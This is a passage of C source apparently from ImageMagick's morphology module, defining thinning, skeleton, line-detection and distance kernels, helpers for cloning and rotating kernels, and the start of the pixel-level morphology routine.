ExpandRotateKernelInfo(kernel, 90.0); /* Expand 90 degree rotations */
break;
}
case DiagonalsKernel:
{
switch ( (int) args->rho ) {
case 0:
default:
{ KernelInfo
*new_kernel;
kernel=ParseKernelArray("3: 0,0,0 0,-,1 1,1,-");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
new_kernel=ParseKernelArray("3: 0,0,1 0,-,1 0,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
ExpandMirrorKernelInfo(kernel);
return(kernel);
}
case 1:
kernel=ParseKernelArray("3: 0,0,0 0,-,1 1,1,-");
break;
case 2:
kernel=ParseKernelArray("3: 0,0,1 0,-,1 0,1,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case LineEndsKernel:
{ /* Kernels for finding the end of thin lines */
switch ( (int) args->rho ) {
case 0:
default:
/* set of kernels to find all end of lines */
return(AcquireKernelInfo("LineEnds:1>;LineEnds:2>",exception));
case 1:
/* kernel for 4-connected line ends - no rotation */
kernel=ParseKernelArray("3: 0,0,- 0,1,1 0,0,-");
break;
case 2:
/* kernel to add for 8-connected lines - no rotation */
kernel=ParseKernelArray("3: 0,0,0 0,1,0 0,0,1");
break;
case 3:
/* kernel to add for orthogonal line ends - does not find corners */
kernel=ParseKernelArray("3: 0,0,0 0,1,1 0,0,0");
break;
case 4:
/* traditional line end - fails on last T end */
kernel=ParseKernelArray("3: 0,0,0 0,1,- 0,0,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case LineJunctionsKernel:
{ /* kernels for finding the junctions of multiple lines */
switch ( (int) args->rho ) {
case 0:
default:
/* set of kernels to find all line junctions */
return(AcquireKernelInfo("LineJunctions:1@;LineJunctions:2>",exception));
case 1:
/* Y Junction */
kernel=ParseKernelArray("3: 1,-,1 -,1,- -,1,-");
break;
case 2:
/* Diagonal T Junctions */
kernel=ParseKernelArray("3: 1,-,- -,1,- 1,-,1");
break;
case 3:
/* Orthogonal T Junctions */
kernel=ParseKernelArray("3: -,-,- 1,1,1 -,1,-");
break;
case 4:
/* Diagonal X Junctions */
kernel=ParseKernelArray("3: 1,-,1 -,1,- 1,-,1");
break;
case 5:
/* Orthogonal X Junctions - minimal diamond kernel */
kernel=ParseKernelArray("3: -,1,- 1,1,1 -,1,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case RidgesKernel:
{ /* Ridges - Ridge finding kernels */
KernelInfo
*new_kernel;
switch ( (int) args->rho ) {
case 1:
default:
kernel=ParseKernelArray("3x1:0,1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 2 rotated kernels (symmetrical) */
break;
case 2:
kernel=ParseKernelArray("4x1:0,1,1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 4 rotated kernels */
/* Kernels to find a stepped 'thick' line, 4 rotates + mirrors */
/* Unfortunatally we can not yet rotate a non-square kernel */
/* But then we can't flip a non-symetrical kernel either */
new_kernel=ParseKernelArray("4x3+1+1:0,1,1,- -,1,1,- -,1,1,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+2+1:0,1,1,- -,1,1,- -,1,1,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+1+1:-,1,1,0 -,1,1,- 0,1,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+2+1:-,1,1,0 -,1,1,- 0,1,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+1:0,-,- 1,1,1 1,1,1 -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+2:0,-,- 1,1,1 1,1,1 -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+1:-,-,0 1,1,1 1,1,1 0,-,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+2:-,-,0 1,1,1 1,1,1 0,-,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
break;
}
break;
}
case ConvexHullKernel:
{
KernelInfo
*new_kernel;
/* first set of 8 kernels */
kernel=ParseKernelArray("3: 1,1,- 1,0,- 1,-,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0);
/* append the mirror versions too - no flip function yet */
new_kernel=ParseKernelArray("3: 1,1,1 1,0,- -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
ExpandRotateKernelInfo(new_kernel, 90.0);
LastKernelInfo(kernel)->next = new_kernel;
break;
}
case SkeletonKernel:
{
switch ( (int) args->rho ) {
case 1:
default:
/* Traditional Skeleton...
** A cyclically rotated single kernel
*/
kernel=AcquireKernelInfo("ThinSE:482",exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 45.0); /* 8 rotations */
break;
case 2:
/* HIPR Variation of the cyclic skeleton
** Corners of the traditional method made more forgiving,
** but the retain the same cyclic order.
*/
kernel=AcquireKernelInfo("ThinSE:482; ThinSE:87x90;",exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
if (kernel->next == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
kernel->type = type;
kernel->next->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 4 rotations of the 2 kernels */
break;
case 3:
/* Dan Bloomberg Skeleton, from his paper on 3x3 thinning SE's
** "Connectivity-Preserving Morphological Image Thransformations"
** by Dan S. Bloomberg, available on Leptonica, Selected Papers,
** http://www.leptonica.com/papers/conn.pdf
*/
kernel=AcquireKernelInfo("ThinSE:41; ThinSE:42; ThinSE:43",
exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->next->type = type;
kernel->next->next->type = type;
ExpandMirrorKernelInfo(kernel); /* 12 kernels total */
break;
}
break;
}
case ThinSEKernel:
{ /* Special kernels for general thinning, while preserving connections
** "Connectivity-Preserving Morphological Image Thransformations"
** by Dan S. Bloomberg, available on Leptonica, Selected Papers,
** http://www.leptonica.com/papers/conn.pdf
** And
** http://tpgit.github.com/Leptonica/ccthin_8c_source.html
**
** Note kernels do not specify the origin pixel, allowing them
** to be used for both thickening and thinning operations.
*/
switch ( (int) args->rho ) {
/* SE for 4-connected thinning */
case 41: /* SE_4_1 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 -,-,1");
break;
case 42: /* SE_4_2 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 -,0,-");
break;
case 43: /* SE_4_3 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,-,1");
break;
case 44: /* SE_4_4 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,0,-");
break;
case 45: /* SE_4_5 */
kernel=ParseKernelArray("3: -,0,1 0,-,1 -,0,-");
break;
case 46: /* SE_4_6 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,0,1");
break;
case 47: /* SE_4_7 */
kernel=ParseKernelArray("3: -,1,1 0,-,1 -,0,-");
break;
case 48: /* SE_4_8 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 0,-,1");
break;
case 49: /* SE_4_9 */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 -,-,1");
break;
/* SE for 8-connected thinning - negatives of the above */
case 81: /* SE_8_0 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 -,1,-");
break;
case 82: /* SE_8_2 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,-,-");
break;
case 83: /* SE_8_3 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 -,1,-");
break;
case 84: /* SE_8_4 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 0,-,-");
break;
case 85: /* SE_8_5 */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 0,-,-");
break;
case 86: /* SE_8_6 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 0,-,1");
break;
case 87: /* SE_8_7 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,0,-");
break;
case 88: /* SE_8_8 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,1,-");
break;
case 89: /* SE_8_9 */
kernel=ParseKernelArray("3: 0,1,- 0,-,1 -,1,-");
break;
/* Special combined SE kernels */
case 423: /* SE_4_2 , SE_4_3 Combined Kernel */
kernel=ParseKernelArray("3: -,-,1 0,-,- -,0,-");
break;
case 823: /* SE_8_2 , SE_8_3 Combined Kernel */
kernel=ParseKernelArray("3: -,1,- -,-,1 0,-,-");
break;
case 481: /* SE_48_1 - General Connected Corner Kernel */
kernel=ParseKernelArray("3: -,1,1 0,-,1 0,0,-");
break;
default:
case 482: /* SE_48_2 - General Edge Kernel */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 0,-,1");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
/*
Distance Measuring Kernels
*/
case ChebyshevKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*MagickMax(fabs((double)u),fabs((double)v)) );
kernel->maximum = kernel->values[0];
break;
}
case ManhattanKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*(labs((long) u)+labs((long) v)) );
kernel->maximum = kernel->values[0];
break;
}
case OctagonalKernel:
{
if (args->rho < 2.0)
kernel->width = kernel->height = 5; /* default/minimum radius = 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{
double
r1 = MagickMax(fabs((double)u),fabs((double)v)),
r2 = floor((double)(labs((long)u)+labs((long)v)+1)/1.5);
kernel->positive_range += kernel->values[i] =
args->sigma*MagickMax(r1,r2);
}
kernel->maximum = kernel->values[0];
break;
}
case EuclideanKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*sqrt((double)(u*u+v*v)) );
kernel->maximum = kernel->values[0];
break;
}
default:
{
/* No-Op Kernel - Basically just a single pixel on its own */
kernel=ParseKernelArray("1:1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = UndefinedKernel;
break;
}
break;
}
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% C l o n e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% CloneKernelInfo() creates a new clone of the given Kernel List so that its
% can be modified without effecting the original. The cloned kernel should
% be destroyed using DestoryKernelInfo() when no longer needed.
%
% The format of the CloneKernelInfo method is:
%
% KernelInfo *CloneKernelInfo(const KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to be cloned
%
*/
MagickExport KernelInfo *CloneKernelInfo(const KernelInfo *kernel)
{
register ssize_t
i;
KernelInfo
*new_kernel;
assert(kernel != (KernelInfo *) NULL);
new_kernel=(KernelInfo *) AcquireMagickMemory(sizeof(*kernel));
if (new_kernel == (KernelInfo *) NULL)
return(new_kernel);
*new_kernel=(*kernel); /* copy values in structure */
/* replace the values with a copy of the values */
new_kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*sizeof(*kernel->values)));
if (new_kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(new_kernel));
for (i=0; i < (ssize_t) (kernel->width*kernel->height); i++)
new_kernel->values[i]=kernel->values[i];
/* Also clone the next kernel in the kernel list */
if ( kernel->next != (KernelInfo *) NULL ) {
new_kernel->next = CloneKernelInfo(kernel->next);
if ( new_kernel->next == (KernelInfo *) NULL )
return(DestroyKernelInfo(new_kernel));
}
return(new_kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e s t r o y K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DestroyKernelInfo() frees the memory used by a Convolution/Morphology
% kernel.
%
% The format of the DestroyKernelInfo method is:
%
% KernelInfo *DestroyKernelInfo(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to be destroyed
%
*/
MagickExport KernelInfo *DestroyKernelInfo(KernelInfo *kernel)
{
assert(kernel != (KernelInfo *) NULL);
if (kernel->next != (KernelInfo *) NULL)
kernel->next=DestroyKernelInfo(kernel->next);
kernel->values=(MagickRealType *) RelinquishAlignedMemory(kernel->values);
kernel=(KernelInfo *) RelinquishMagickMemory(kernel);
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ E x p a n d M i r r o r K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ExpandMirrorKernelInfo() takes a single kernel, and expands it into a
% sequence of 90-degree rotated kernels but providing a reflected 180
% rotatation, before the -/+ 90-degree rotations.
%
% This special rotation order produces a better, more symetrical thinning of
% objects.
%
% The format of the ExpandMirrorKernelInfo method is:
%
% void ExpandMirrorKernelInfo(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% This function is only internel to this module, as it is not finalized,
% especially with regard to non-orthogonal angles, and rotation of larger
% 2D kernels.
*/
#if 0
static void FlopKernelInfo(KernelInfo *kernel)
{ /* Do a Flop by reversing each row. */
size_t
y;
register ssize_t
x,r;
register double
*k,t;
for ( y=0, k=kernel->values; y < kernel->height; y++, k+=kernel->width)
for ( x=0, r=kernel->width-1; x<kernel->width/2; x++, r--)
t=k[x], k[x]=k[r], k[r]=t;
kernel->x = kernel->width - kernel->x - 1;
angle = fmod(angle+180.0, 360.0);
}
#endif
static void ExpandMirrorKernelInfo(KernelInfo *kernel)
{
KernelInfo
*clone,
*last;
last = kernel;
clone = CloneKernelInfo(last);
if (clone == (KernelInfo *) NULL)
return;
RotateKernelInfo(clone, 180); /* flip */
LastKernelInfo(last)->next = clone;
last = clone;
clone = CloneKernelInfo(last);
if (clone == (KernelInfo *) NULL)
return;
RotateKernelInfo(clone, 90); /* transpose */
LastKernelInfo(last)->next = clone;
last = clone;
clone = CloneKernelInfo(last);
if (clone == (KernelInfo *) NULL)
return;
RotateKernelInfo(clone, 180); /* flop */
LastKernelInfo(last)->next = clone;
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ E x p a n d R o t a t e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ExpandRotateKernelInfo() takes a kernel list, and expands it by rotating
% incrementally by the angle given, until the kernel repeats.
%
% WARNING: 45 degree rotations only works for 3x3 kernels.
% While 90 degree roatations only works for linear and square kernels
%
% The format of the ExpandRotateKernelInfo method is:
%
% void ExpandRotateKernelInfo(KernelInfo *kernel, double angle)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o angle: angle to rotate in degrees
%
% This function is only internel to this module, as it is not finalized,
% especially with regard to non-orthogonal angles, and rotation of larger
% 2D kernels.
*/
/* Internal Routine - Return true if two kernels are the same */
static MagickBooleanType SameKernelInfo(const KernelInfo *kernel1,
const KernelInfo *kernel2)
{
register size_t
i;
/* check size and origin location */
if ( kernel1->width != kernel2->width
|| kernel1->height != kernel2->height
|| kernel1->x != kernel2->x
|| kernel1->y != kernel2->y )
return MagickFalse;
/* check actual kernel values */
for (i=0; i < (kernel1->width*kernel1->height); i++) {
/* Test for Nan equivalence */
if ( IsNaN(kernel1->values[i]) && !IsNaN(kernel2->values[i]) )
return MagickFalse;
if ( IsNaN(kernel2->values[i]) && !IsNaN(kernel1->values[i]) )
return MagickFalse;
/* Test actual values are equivalent */
if ( fabs(kernel1->values[i] - kernel2->values[i]) >= MagickEpsilon )
return MagickFalse;
}
return MagickTrue;
}
static void ExpandRotateKernelInfo(KernelInfo *kernel, const double angle)
{
KernelInfo
*clone_info,
*last;
last=kernel;
DisableMSCWarning(4127)
while (1) {
RestoreMSCWarning
clone_info=CloneKernelInfo(last);
if (clone_info == (KernelInfo *) NULL)
break;
RotateKernelInfo(clone_info,angle);
if (SameKernelInfo(kernel,clone_info) != MagickFalse)
break;
LastKernelInfo(last)->next=clone_info;
last=clone_info;
}
if (clone_info != (KernelInfo *) NULL)
clone_info=DestroyKernelInfo(clone_info); /* kernel repeated - junk */
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ C a l c M e t a K e r n a l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% CalcKernelMetaData() recalculate the KernelInfo meta-data of this kernel only,
% using the kernel values. This should only ne used if it is not possible to
% calculate that meta-data in some easier way.
%
% It is important that the meta-data is correct before ScaleKernelInfo() is
% used to perform kernel normalization.
%
% The format of the CalcKernelMetaData method is:
%
% void CalcKernelMetaData(KernelInfo *kernel, const double scale )
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to modify
%
% WARNING: Minimum and Maximum values are assumed to include zero, even if
% zero is not part of the kernel (as in Gaussian Derived kernels). This
% however is not true for flat-shaped morphological kernels.
%
% WARNING: Only the specific kernel pointed to is modified, not a list of
% multiple kernels.
%
% This is an internal function and not expected to be useful outside this
% module. This could change however.
*/
static void CalcKernelMetaData(KernelInfo *kernel)
{
register size_t
i;
kernel->minimum = kernel->maximum = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
for (i=0; i < (kernel->width*kernel->height); i++)
{
if ( fabs(kernel->values[i]) < MagickEpsilon )
kernel->values[i] = 0.0;
( kernel->values[i] < 0)
? ( kernel->negative_range += kernel->values[i] )
: ( kernel->positive_range += kernel->values[i] );
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
}
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M o r p h o l o g y A p p l y %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% MorphologyApply() applies a morphological method, multiple times using
% a list of multiple kernels. This is the method that should be called by
% other 'operators' that internally use morphology operations as part of
% their processing.
%
% It is basically equivalent to as MorphologyImage() (see below) but without
% any user controls. This allows internel programs to use this method to
% perform a specific task without possible interference by any API user
% supplied settings.
%
% It is MorphologyImage() task to extract any such user controls, and
% pass them to this function for processing.
%
% More specifically all given kernels should already be scaled, normalised,
% and blended appropriatally before being parred to this routine. The
% appropriate bias, and compose (typically 'UndefinedComposeOp') given.
%
% The format of the MorphologyApply method is:
%
% Image *MorphologyApply(const Image *image,MorphologyMethod method,
% const ssize_t iterations,const KernelInfo *kernel,
% const CompositeMethod compose,const double bias,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the source image
%
% o method: the morphology method to be applied.
%
% o iterations: apply the operation this many times (or no change).
% A value of -1 means loop until no change found.
% How this is applied may depend on the morphology method.
% Typically this is a value of 1.
%
% o channel: the channel type.
%
% o kernel: An array of double representing the morphology kernel.
%
% o compose: How to handle or merge multi-kernel results.
% If 'UndefinedCompositeOp' use default for the Morphology method.
% If 'NoCompositeOp' force image to be re-iterated by each kernel.
% Otherwise merge the results using the compose method given.
%
% o bias: Convolution Output Bias.
%
% o exception: return any errors or warnings in this structure.
%
*/
static ssize_t MorphologyPrimitive(const Image *image,Image *morphology_image,
const MorphologyMethod method,const KernelInfo *kernel,const double bias,
ExceptionInfo *exception)
{
#define MorphologyTag "Morphology/Image"
CacheView
*image_view,
*morphology_view;
OffsetInfo
offset;
register ssize_t
j,
y;
size_t
*changes,
changed,
width;
MagickBooleanType
status;
MagickOffsetType
progress;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
assert(morphology_image != (Image *) NULL);
assert(morphology_image->signature == MagickCoreSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickCoreSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
status=MagickTrue;
progress=0;
image_view=AcquireVirtualCacheView(image,exception);
morphology_view=AcquireAuthenticCacheView(morphology_image,exception);
width=image->columns+kernel->width-1;
offset.x=0;
offset.y=0;
switch (method)
{
case ConvolveMorphology:
case DilateMorphology:
case DilateIntensityMorphology:
case IterativeDistanceMorphology:
{
/*
Kernel needs to used with reflection about origin.
*/
offset.x=(ssize_t) kernel->width-kernel->x-1;
offset.y=(ssize_t) kernel->height-kernel->y-1;
break;
}
case ErodeMorphology:
case ErodeIntensityMorphology:
case HitAndMissMorphology:
case ThinningMorphology:
case ThickenMorphology:
{
offset.x=kernel->x;
offset.y=kernel->y;
break;
}
default:
{
assert("Not a Primitive Morphology Method" != (char *) NULL);
break;
}
}
changed=0;
changes=(size_t *) AcquireQuantumMemory(GetOpenMPMaximumThreads(),
sizeof(*changes));
if (changes == (size_t *) NULL)
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
for (j=0; j < (ssize_t) GetOpenMPMaximumThreads(); j++)
changes[j]=0;
if ((method == ConvolveMorphology) && (kernel->width == 1))
{
register ssize_t
x;
/*
Special handling (for speed) of vertical (blur) kernels. This performs
its handling in columns rather than in rows. This is only done
for convolve as it is the only method that generates very large 1-D
vertical kernels (such as a 'BlurKernel')
*/
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(progress,status) \
magick_threads(image,morphology_image,image->columns,1)
#endif
for (x=0; x < (ssize_t) image->columns; x++)
{
const int
id = GetOpenMPThreadId();
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
register ssize_t
r;
ssize_t
center;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,x,-offset.y,1,image->rows+
kernel->height-1,exception);
q=GetCacheViewAuthenticPixels(morphology_view,x,0,1,
morphology_image->rows,exception);
if ((p == (const Quantum *) NULL) || (q == (Quantum *) NULL))
{
status=MagickFalse;
continue;
}
center=(ssize_t) GetPixelChannels(image)*offset.y;
for (r=0; r < (ssize_t) image->rows; r++)
{
register ssize_t
i;
for (i=0; i < (ssize_t) GetPixelChannels(image); i++)
{
double
alpha,
gamma,
pixel;
PixelChannel
channel;
PixelTrait
morphology_traits,
traits;
register const MagickRealType
*magick_restrict k;
register const Quantum
*magick_restrict pixels;
register ssize_t
v;
size_t
count;
channel=GetPixelChannelChannel(image,i);
traits=GetPixelChannelTraits(image,channel);
morphology_traits=GetPixelChannelTraits(morphology_image,channel);
if ((traits == UndefinedPixelTrait) ||
(morphology_traits == UndefinedPixelTrait))
continue;
if (((traits & CopyPixelTrait) != 0) ||
(GetPixelWriteMask(image,p+center) <= (QuantumRange/2)))
{
SetPixelChannel(morphology_image,channel,p[center+i],q);
continue;
}
k=(&kernel->values[kernel->height-1]);
pixels=p;
pixel=bias;
gamma=0.0;
count=0;
if ((morphology_traits & BlendPixelTrait) == 0)
for (v=0; v < (ssize_t) kernel->height; v++)
{
if (!IsNaN(*k))
{
pixel+=(*k)*pixels[i];
gamma+=(*k);
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
else
for (v=0; v < (ssize_t) kernel->height; v++)
{
if (!IsNaN(*k))
{
alpha=(double) (QuantumScale*GetPixelAlpha(image,pixels));
pixel+=alpha*(*k)*pixels[i];
gamma+=alpha*(*k);
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
if (fabs(pixel-p[center+i]) > MagickEpsilon)
changes[id]++;
gamma=PerceptibleReciprocal(gamma);
if (count != 0)
gamma*=(double) kernel->height/count;
SetPixelChannel(morphology_image,channel,ClampToQuantum(gamma*
pixel),q);
}
p+=GetPixelChannels(image);
q+=GetPixelChannels(morphology_image);
}
if (SyncCacheViewAuthenticPixels(morphology_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_MorphologyPrimitive)
#endif
proceed=SetImageProgress(image,MorphologyTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
morphology_image->type=image->type;
morphology_view=DestroyCacheView(morphology_view);
image_view=DestroyCacheView(image_view);
for (j=0; j < (ssize_t) GetOpenMPMaximumThreads(); j++)
changed+=changes[j];
changes=(size_t *) RelinquishMagickMemory(changes);
return(status ? (ssize_t) changed : 0);
}
/*
Normal handling of horizontal or rectangular kernels (row by row).
*/
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(progress,status) \
magick_threads(image,morphology_image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
register ssize_t
x;
ssize_t
center;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,-offset.x,y-offset.y,width,
kernel->height,exception);
q=GetCacheViewAuthenticPixels(morphology_view,0,y,morphology_image->columns,
1,exception);
if ((p == (const Quantum *) NULL) || (q == (Quantum *) NULL))
{
status=MagickFalse;
continue;
}
center=(ssize_t) (GetPixelChannels(image)*width*offset.y+
GetPixelChannels(image)*offset.x);
for (x=0; x < (ssize_t) image->columns; x++)
{
register ssize_t
i;
